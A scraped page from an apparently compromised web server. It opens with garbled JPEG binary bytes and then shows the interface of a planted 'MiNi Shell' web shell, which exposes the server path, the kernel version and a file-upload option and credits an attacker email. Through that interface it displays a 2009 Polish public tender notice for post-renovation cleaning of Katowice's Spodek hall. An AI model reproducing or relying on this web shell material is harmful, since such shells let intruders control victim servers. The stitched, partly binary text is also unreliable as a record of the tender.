JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090526/167404-N-2009.html

<p class="kh_header"><b>Katowice: Prace porządkowe po modernizacji głównej hali Spodka</b><br>
<b>Numer ogłoszenia: 167404 - 2009; data zamieszczenia: 26.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , Aleja Korfantego 35, 40-005 Katowice, woj. śląskie, tel. 032 2537741, 2538733, faks 032 2538733.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.um.katowice.pl/jednostki/mosir/bip/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa miasta Katowice nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prace porządkowe po modernizacji głównej hali Spodka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Prace porządkowe po przeprowadzonej modernizacji hali głównej Spodka polegające w szczególności na: 
a) czyszczeniu sanitariatów:
- mycie ścian glazurowanych, posadzek, desek klozetowych, pisuarów, muszli, kloszy oświetleniowych, luster, drzwi, kaloryferów, parapetów, umywalek wraz z armaturą sanitarną, pojemników na papier, mydło i ręczniki oraz kratek ściekowych, rur, koszy na odpadki oraz koszy na zużyte ręczniki jednorazowe środkami przeznaczonymi do czyszczenia tych powierzchni,
- dezynsekcja wszystkich urządzeń sanitarnych przy użyciu wysokiej jakości środków dezynfekujących - łącznie z podłogą i glazurą,
b) czyszczeniu posadzek szatni, korytarzy, holi oraz klatek schodowych:
- zamiatanie i mycie posadzek korytarzy przy użyciu wysokowydajnych agregatów lub maszyn czyszczących oraz przy użyciu wysokiej jakości atestowanych środków chemicznych, 
- zamiatanie, odkurzanie, mycie na mokro klatek schodowych, z użyciem środków odpowiednich dla sprzątanej powierzchni,
- mycie na mokro poręczy, balustrad, parapetów wewnętrznych, mebli takich jak krzesła (ok. 11 100 sztuk), stoliki i inne,
- mycie na mokro gaśnic i skrzynek hydrantowych, kaloryferów oraz innych elementów korytarzy 
i holi,
- mycie na mokro i czyszczenie wejściowych drzwi wewnętrznych i zewnętrznych,
c) czyszczeniu schodów 
- szorowanie schodów wewnętrznych przy użyciu urządzeń oraz stosowanych środków chemicznych w zależności od rodzaju czyszczonej powierzchni,
d) myciu i czyszczeniu powierzchni szklanych i drzwi
- mycie przeszkleń oraz ścianek strukturalnych oraz mycie futryn, drzwi dwustronnie wraz 
z klamkami i szyldami przy użyciu środków stosownych do rodzaju czyszczonej powierzchni.
Ogólna powierzchnia posadzek 	 - 16 756m2
					
e) szlifowaniu i polerowaniu posadzki wraz z naprawą i uzupełnieniem ubytków
- szlifowanie należy wykonać specjalistycznymi maszynami z zastosowaniem pełnego cyklu technologicznego, tarcz diamentowych i uzupełnionych impregnacją lub krystalizacją posadzek 
z zastosowaniem impregnatów nadających szlifowanemu kamieniowi oprócz maksymalnej barwy 
i wysokiego połysku również odporność na wnikanie wilgoci i brudu. 
Ogólna powierzchnia posadzek - 4200m2 (antresola, bufet prawy z korytarzami do osi A i zejście lewe z korytarzami do osi A).

 Zamawiający wykonał wzorcową próbę szlifowania i polerowania, jakość wykonanego szlifowania i polerowania nie może być gorsza niż wykonana (z wypolerowaną powierzchnią można się zapoznać podczas wizji lokalnej).

Użyte środki i materiały muszą posiadać atest PZH lub karty charakterystyki zgodnie 
z obowiązującymi przepisami (do okazania na żądanie Zamawiającego), być dobrej jakości 
i nieszkodliwe dla środowiska jak i przedmiotu zamówienia podlegającemu czyszczeniu, Środki te muszą zostać dopuszczone do obrotu, muszą być odpowiednie do rodzaju czyszczonej powierzchni oraz muszą być stosowane przed upływem terminu przydatności do użycia i w okresie ważności gwarancji producenta (jeśli takiej udziela). Zamawiający zastrzega sobie prawo kontroli 
i weryfikacji stosowanych środków. 

Wykonawca będzie zobowiązany do wzięcia odpowiedzialności za sprzęt i wyposażenie znajdujące się w sprzątanych pomieszczeniach, za stan powierzonych mu pomieszczeń oraz za szkody powstałe z jego winy w trakcie wykonywania zamówienia. 

Zamawiający zaleca przeprowadzenie wizji lokalnej. 

Zamawiający wyznacza termin przeprowadzenia wizji lokalnej na dzień 29.05.2009r. o godz. 09.00. Zbiórka przed wejściem do siedziby Dyrekcji MOSIR, Katowice, Al. Korfantego 35..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wysokość i forma wadium:
1. Wykonawca winien wnieść wadium przetargowe w wysokości 10.000 zł. przed upływem   terminu składania ofert, zgodnie z art. 45.3 Ustawy.
2.	Miejsce wniesienia wadium
	Wadium należy wpłacić przelewem na konto Miejskiego Ośrodka Sportu i Rekreacji 	Katowice: ING Bank Śląski S.A. Oddział Katowice nr 48 1050 1214 1000 0022 0055 0750 	z dopiskiem (wadium dla zamówienia - prace porządkowe).
	Kserokopię dowodu wpłaty wadium należy dołączyć do oferty.
	Oryginał dokumentu potwierdzającego wniesienie wadium w innej formie niż w pieniądzu
	 (gwarancje bezwarunkowe i płatne na pierwsze żądanie) powinien być dołączony do 	oferty).
3.	   Zwrot wadium
 Zwrot wadium wykonawcom nie wybranym do wykonania zamówienia nastąpi zgodnie z 	art. 46 Ustawy. 
Zamawiający zażąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie art. 46 ust. 2 pkt 2 i 3 ustawy, jeśli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego. 
4.     Sytuacje skutkujące przepadkiem wadium na rzecz Zamawiającego. 
         Na podstawie art. 46 ust. 4a i 5 Ustawy Zamawiający zatrzymuje wadium wraz z odsetkami.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają  warunki określone w art. 22 ust.1 ustawy, a także spełniają wymagania przedstawione poniżej 

a) posiadają polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie wykonywanej działalności gospodarczej,

b) wykażą, że wykonali co najmniej 1 usługę odpowiadającą swoim rodzajem i wartością przedmiotowi zamówienia (tj. sprzątanie - porządkowanie  powierzchni min.  10.000m2 w budynku użyteczności publicznej) w okresie ostatnich 3 lat,  a jeżeli okres prowadzenia działalności jest krótszy  -  w tym okresie, 

	c) załączą do oferty dokumenty potwierdzające, że usługa o której mowa wyżej	została 	wykonana należycie;

	d) złożą wymagane dokumenty o których mowa w pkt. 6 SIWZ.

2)	Ocena spełniania warunków odbędzie się na podstawie złożonych oświadczeń 
i dokumentów na zasadzie spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu

1)	Ofertę na formularzu oferty, o treści zgodnej z określoną we wzorze stanowiącym  załącznik nr 1 do SIWZ.
2)	Oświadczenia oraz dokumenty potwierdzające spełnianie warunków:
a)	aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku składania oferty przez Wykonawców występujących wspólnie w/w dokument musi być złożony przez każdego Wykonawcę. Nie dopuszcza się poświadczenia za zgodność z oryginałem zaświadczeń o wpisie do ewidencji działalności gospodarczej lub odpisów z KRS, wystawionych przez właściwe organy w terminie  wcześniejszym niż 6 miesięcy od daty złożenia oferty. Wymaga się złożenia aktualnych zaświadczeń o wpisie do ewidencji działalności gospodarczej lub odpisów z KRS, 
b)	oświadczenie, o treści określonej w art. 22 ust. 1 oraz art. 24 ust. 1 i 2 ustawy - że Wykonawca może ubiegać się o udzielenie zamówienia zgodnie z art. 22 ust. 
1 ustawy, wg wzoru stanowiącego załącznik  nr 2 do SIWZ,
c)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub  zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione  nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. W przypadku składania oferty przez Wykonawców występujących wspólnie w/w dokumenty muszą być złożone przez każdego Wykonawcę, 
d)	aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
e)	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt.9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
f)	polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej (suma ubezpieczenia nie może być niższa niż oferowana cena, wynikająca z treści złożonej oferty),
g)	wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem 
i wartością usługom stanowiącym przedmiot zamówienia (przez usługę odpowiadającą przedmiotowi zamówienia rozumie się sprzątanie - porządkowanie  powierzchni min.  10.000m2 w budynku użyteczności publicznej), z podaniem ich wartości oraz daty i miejsca wykonania oraz  dokumenty np. referencje  potwierdzające, że usługi zostały wykonane należycie zgodnie ze wzorem stanowiącym załącznik nr 3 do SIWZ. Wykaz powinien zawierać minimum jedną wykonaną przez wykonawcę usługę.

3)	Oryginał dokumentu potwierdzającego wniesienie wadium w innej formie niż w pieniądzu (gwarancje bezwarunkowe i płatne na pierwsze żądanie) lub kserokopia poświadczona za zgodność z oryginałem potwierdzająca wniesienie wadium  przelewem na konto bankowe.
4)	Formularz cenowy o treści zgodnej z określoną we wzorze stanowiącym  załącznik nr 1A do SIWZ.

Uwaga!

Wykonawca, który  ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów o których mowa w punkcie 6 ppkt. 2 lit. a, c, d, e,  SIWZ składa dokument lub dokumenty w formie jak określono § 2 Rozporządzenia  Prezesa Rady Ministrów z dnia 19.05.2006 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane ( D.U 87 z 2006r.z późn. zm.).

Oferty wspólne
W przypadku  gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia (np. spółki cywilne, konsorcja) -ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Fakt ustanowienia pełnomocnika należy udokumentować dołączeniem pełnomocnictwa podpisanego przez wszystkich wykonawców wspólnie ubiegających się o zamówienie. Pełnomocnictwo winno być w formie oryginału lub notarialnie poświadczonej kopii.
Wykonawcy występujący  wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy.

Zamawiający przy ocenie spełniania warunków będzie rozpatrywał podane informacje łącznie 
z zastrzeżeniem, że:
a)	spółki cywilne- dokumenty wymienione w pkt. 6 ppkt. 2 lit. a, b, c, d SIWZ muszą przedstawić dla każdego ze wspólników spółki osobno,
b)	konsorcja - dokumenty wymienione w pkt. 6 ppkt. 2 lit. a, b, c, d, e SIWZ (o ile dotyczy) muszą przedstawić dla każdego z partnerów konsorcjum osobno; ponadto muszą dołączyć list intencyjny podpisany przez wszystkich partnerów konsorcjum, z podziałem ich obowiązków podczas realizacji zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.um.katowice.pl/jednostki/mosir/bip/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji w Katowicach, Al. Korfantego 35, 40-005 Katowice,.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2009 godzina 09:00, miejsce: Miejski Ośrodek Sportu i Rekreacji w Katowicach, Al. Korfantego 35, 40-005 Katowice, pokój nr 8.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com